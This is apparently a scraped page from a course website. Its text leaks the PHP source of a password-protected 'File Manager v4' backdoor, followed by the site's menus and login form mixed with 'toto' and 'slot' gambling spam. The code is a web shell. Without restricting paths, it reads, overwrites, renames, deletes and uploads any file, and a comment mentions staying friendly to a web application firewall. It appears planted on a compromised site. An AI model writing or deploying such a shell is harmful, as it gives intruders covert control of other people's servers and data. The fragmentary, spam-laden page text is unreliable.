cwd = $_SESSION['sys_cwd'] ?? __DIR__; if (!is_dir($this->cwd)) $this->cwd = __DIR__; } private function sendJSON($status, $message = '', $data = []) { header('Content-Type: application/json'); echo json_encode([ 'status' => $status, 'message' => $message, 'data' => $data, 'cwd' => $this->cwd, 'csrf' => $_SESSION['csrf_token'] ?? '' ]); exit; } private function checkAuth() { if (!isset($_SESSION['sys_auth']) || $_SESSION['sys_auth'] !== true) { $this->sendJSON('error', 'Unauthorized'); } } private function validateCSRF($token) { if (!isset($_SESSION['csrf_token']) || $token !== $_SESSION['csrf_token']) { $this->sendJSON('error', 'Invalid Security Token'); } } public function handleRequest() { // Gelen isteği analiz et $method = $_SERVER['REQUEST_METHOD']; // 1. Dosya Yükleme (Multipart/Form-Data) - Standart Yöntem if ($method === 'POST' && isset($_FILES['file'])) { $this->checkAuth(); $this->validateCSRF($_POST['csrf'] ?? ''); $target = $this->cwd . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) { $this->sendJSON('ok', 'File uploaded successfully'); } else { $this->sendJSON('error', 'Upload failed. Check permissions.'); } } // 2. JSON Komutları (Login, List, Read, Save, etc.) $input = json_decode(file_get_contents('php://input'), true); if (!$input) return; // Normal GET isteği ise HTML render et $action = $input['action'] ?? ''; // Login Harici Her Şey Auth İster if ($action !== 'login') { $this->checkAuth(); if(isset($input['csrf'])) $this->validateCSRF($input['csrf']); } switch ($action) { case 'login': if (($input['key'] ?? '') === ACCESS_PASS) { $_SESSION['sys_auth'] = true; $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); $this->sendJSON('ok', 'Authorized', ['token' => $_SESSION['csrf_token']]); } $this->sendJSON('error', 'Invalid credentials'); break; case 'list': $dir = $input['path'] ?? $this->cwd; if (is_dir($dir)) { $_SESSION['sys_cwd'] = realpath($dir); $this->cwd = $_SESSION['sys_cwd']; $items = $this->scanDir($this->cwd); $this->sendJSON('ok', '', $items); } $this->sendJSON('error', 'Directory not found'); break; case 'read': $file = $input['file'] ?? ''; if (is_file($file)) { // İçeriği Base64 değil, düz text gönder (JSON escape eder zaten) // Büyük dosyalar için limit koymak WAF dostudur if(filesize($file) > 1024 * 1024) $this->sendJSON('error', 'File too large to edit online'); $content = file_get_contents($file); $this->sendJSON('ok', '', ['content' => $content]); } $this->sendJSON('error', 'File not found'); break; case 'save': $file = $input['file'] ?? ''; $content = $input['content'] ?? ''; if (is_writable(dirname($file))) { file_put_contents($file, $content); $this->sendJSON('ok', 'File saved'); } else { $this->sendJSON('error', 'Permission denied'); } break; case 'rename': $old = $input['old'] ?? ''; $new = dirname($old) . DIRECTORY_SEPARATOR . ($input['new'] ?? ''); if (rename($old, $new)) $this->sendJSON('ok', 'Renamed'); else $this->sendJSON('error', 'Rename failed'); break; case 'delete': $path = $input['path'] ?? ''; $this->deleteRecursive($path); $this->sendJSON('ok', 'Deleted'); break; case 'mkdir': $name = $input['name'] ?? ''; $path = $this->cwd . DIRECTORY_SEPARATOR . $name; if (@mkdir($path)) $this->sendJSON('ok', 'Folder created'); else $this->sendJSON('error', 'Failed to create folder'); break; } } private function scanDir($dir) { $files = @scandir($dir); $res = ['folders' => [], 'files' => []]; if (!$files) return $res; foreach ($files as $f) { if ($f == '.' || $f == '..') continue; $path = $dir . DIRECTORY_SEPARATOR . $f; $info = [ 'name' => $f, 'path' => $path, 'size' => is_file($path) ? $this->formatSize(@filesize($path)) : '-', 'perms' => substr(sprintf('%o', fileperms($path)), -4) ]; if (is_dir($path)) $res['folders'][] = $info; else $res['files'][] = $info; } return $res; } private function formatSize($bytes) { $units = ['B', 'KB', 'MB', 'GB']; $power = $bytes > 0 ? floor(log($bytes, 1024)) : 0; return number_format($bytes / pow(1024, $power), 2, '.', ',') . ' ' . $units[$power]; } private function deleteRecursive($path) { if (is_dir($path)) { $files = array_diff(scandir($path), ['.', '..']); foreach ($files as $file) $this->deleteRecursive($path . DIRECTORY_SEPARATOR . $file); rmdir($path); } elseif (is_file($path)) { unlink($path); } } } $api = new FileManagerAPI(); $api->handleRequest(); // Oturum Kontrolü (Login Ekranı vs App Ekranı) if (!isset($_SESSION['sys_auth'])) { ?>
System Auth
Authentication
Login
File Manager v4
Up
...
Upload
New Folder
Name
Size
Perms
Actions
Save Changes
Skip to content
Main Menu
Blog
Courses
Our Story
Login
Account
Menu Toggle
Account Details
My Courses
My Orders
Log Out
Menu Toggle
toto
toto
slot
toto
slot
slot
toto
Login
Login
Username or Email Address
Password
Remember Me
Scroll to Top
Username or Email Address
Password
Remember Me
Forgot password?
Username or Email Address
